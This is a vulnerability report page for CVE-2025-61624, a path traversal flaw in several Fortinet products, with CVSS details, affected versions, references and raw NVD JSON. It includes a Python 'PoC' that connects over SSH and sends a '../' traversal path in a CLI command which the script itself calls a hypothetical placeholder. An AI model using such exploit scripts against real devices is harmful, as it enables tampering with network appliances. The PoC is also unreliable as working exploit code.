Security Vulnerability Report
CVE-2025-61624 CVSS 6.0 MEDIUM

CVE-2025-61624

Published: 2026-04-14 16:16:31
Last Modified: 2026-05-12 13:17:23

Description

An Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') [CWE-22] vulnerability in Fortinet FortiOS 7.6.0 through 7.6.4, FortiOS 7.4.0 through 7.4.9, FortiOS 7.2 all versions, FortiOS 7.0 all versions, FortiOS 6.4 all versions, FortiPAM 1.7.0, FortiPAM 1.6 all versions, FortiPAM 1.5 all versions, FortiPAM 1.4 all versions, FortiPAM 1.3 all versions, FortiPAM 1.2 all versions, FortiPAM 1.1 all versions, FortiPAM 1.0 all versions, FortiProxy 7.6.0 through 7.6.4, FortiProxy 7.4.0 through 7.4.11, FortiProxy 7.2 all versions, FortiProxy 7.0 all versions, FortiSwitchManager 7.2.0 through 7.2.7, FortiSwitchManager 7.0.0 through 7.0.6 may allow an authenticated attacker with admin profile and at least read-write permissions to write or delete arbitrary files via specific CLI commands.

CVSS Details

CVSS Score
6.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* (6.4.0 up to, excluding, 7.4.10) - VULNERABLE
cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* (7.6.0 up to, excluding, 7.6.5) - VULNERABLE
cpe:2.3:o:fortinet:fortipam:*:*:*:*:*:*:*:* (1.0.0 up to, excluding, 1.7.1) - VULNERABLE
cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:* (7.0.0 up to, excluding, 7.4.12) - VULNERABLE
cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:* (7.6.0 up to, excluding, 7.6.5) - VULNERABLE
cpe:2.3:a:fortinet:fortiswitchmanager:*:*:*:*:*:*:*:* (7.0.0 up to, excluding, 7.0.7) - VULNERABLE
cpe:2.3:a:fortinet:fortiswitchmanager:*:*:*:*:*:*:*:* (7.2.0 up to, excluding, 7.2.8) - VULNERABLE
FortiOS 7.6.0 - 7.6.4
FortiOS 7.4.0 - 7.4.9
FortiOS 7.2 (all versions)
FortiOS 7.0 (all versions)
FortiOS 6.4 (all versions)
FortiPAM 1.7.0
FortiPAM 1.6 (all versions)
FortiPAM 1.5 (all versions)
FortiPAM 1.4 (all versions)
FortiPAM 1.3 (all versions)
FortiPAM 1.2 (all versions)
FortiPAM 1.1 (all versions)
FortiPAM 1.0 (all versions)
FortiProxy 7.6.0 - 7.6.4
FortiProxy 7.4.0 - 7.4.11
FortiProxy 7.2 (all versions)
FortiProxy 7.0 (all versions)
FortiSwitchManager 7.2.0 - 7.2.7
FortiSwitchManager 7.0.0 - 7.0.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
PoC for CVE-2025-61624 (Path Traversal in Fortinet Products)

This script demonstrates the concept of the vulnerability.
Note: Actual exploitation requires valid admin credentials and specific
CLI commands; the command used below is a placeholder, not a real one.
"""
import time

import paramiko


def exploit(target_ip, username, password):
    # Establish SSH connection to the target device
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        ssh.connect(target_ip, username=username, password=password)
        chan = ssh.invoke_shell()
        # Wait for shell to initialize
        time.sleep(1)

        # The specific vulnerable CLI command is abstracted here.
        # The vulnerability lies in the file path argument.
        # Payload to write a file to an arbitrary location (e.g., /tmp/pwned.txt)
        malicious_path = "../../../../tmp/pwned.txt"

        # Example command structure (hypothetical based on description)
        # Vulnerable command might be something like 'execute backup config' or similar
        payload = f'execute some_vulnerable_command save {malicious_path}\n'
        chan.send(payload)
        time.sleep(2)
        output = chan.recv(1024).decode()
        print(f"Command output: {output}")

        if "Success" in output or "Command executed" in output:
            print("[+] Exploit successful! File likely written.")
        else:
            print("[-] Exploit failed or command not vulnerable.")
    except Exception as e:
        print(f"Error: {e}")
    finally:
        # close() is safe even when connect() failed
        ssh.close()


if __name__ == "__main__":
    # Replace with actual target details
    exploit("192.168.1.1", "admin", "password")
```

References

https://fortiguard.fortinet.com/psirt/FG-IR-26-122 (Vendor Advisory)
https://cert-portal.siemens.com/productcert/html/ssa-975644.html

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61624", "sourceIdentifier": "[email protected]", "published": "2026-04-14T16:16:31.300", "lastModified": "2026-05-12T13:17:23.170", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') [CWE-22] vulnerability in Fortinet FortiOS 7.6.0 through 7.6.4, FortiOS 7.4.0 through 7.4.9, FortiOS 7.2 all versions, FortiOS 7.0 all versions, FortiOS 6.4 all versions, FortiPAM 1.7.0, FortiPAM 1.6 all versions, FortiPAM 1.5 all versions, FortiPAM 1.4 all versions, FortiPAM 1.3 all versions, FortiPAM 1.2 all versions, FortiPAM 1.1 all versions, FortiPAM 1.0 all versions, FortiProxy 7.6.0 through 7.6.4, FortiProxy 7.4.0 through 7.4.11, FortiProxy 7.2 all versions, FortiProxy 7.0 all versions, FortiSwitchManager 7.2.0 through 7.2.7, FortiSwitchManager 7.0.0 through 7.0.6 may allow an authenticated attacker with admin profile and at least read-write permissions to write or delete arbitrary files via specific CLI commands."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, 
"impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.4.0", "versionEndExcluding": "7.4.10", "matchCriteriaId": "8E0DD361-4041-480A-8B5E-1E14BBDD8133"}, {"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.5", "matchCriteriaId": "26DF2CCC-782C-4AE8-8CDE-13FFEE8676E6"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortipam:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.0", "versionEndExcluding": "1.7.1", "matchCriteriaId": "C8E26F28-B9CA-47D5-86B0-AA98C67D9314"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.4.12", "matchCriteriaId": "92465F3D-698E-4CA6-87CB-E5A08C34067E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.5", "matchCriteriaId": "026DF873-FF5C-4629-8516-350C53CE2DEA"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiswitchmanager:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.0.7", "matchCriteriaId": "23564E7E-21B7-4936-B4F2-85CD46D64A5D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiswitchmanager:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.2.0", "versionEndExcluding": "7.2.8", "matchCriteriaId": "6EFEB80D-87BB-4AD3-AA9D-9F0C37F227D2"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-26-122", "source": "[email protected]", 
"tags": ["Vendor Advisory"]}, {"url": "https://cert-portal.siemens.com/productcert/html/ssa-975644.html", "source": "0b142b55-0307-4c5a-b3c9-f314f3fb7c5e"}]}}